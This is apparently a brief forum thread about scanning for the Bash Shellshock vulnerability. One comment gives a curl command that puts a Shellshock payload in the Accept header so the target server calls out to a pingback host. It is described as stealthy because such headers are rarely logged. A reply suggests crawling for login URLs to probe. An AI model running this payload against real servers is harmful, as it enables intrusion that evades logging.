|
|
|
|
|
by gwillem
4282 days ago
|
|
This is quite stealthy way to scan, as Accept headers are generally not logged: curl -H 'Accept: () { :;}; /usr/bin/curl -so /dev/null http://my.pingback.com'
Found nothing so far though. IMHO the number of Bash CGI scripts in the wild must be pretty low. |
|
I would go with /login and such, or write a crawler to parse out where the login/logout URLs are and try those.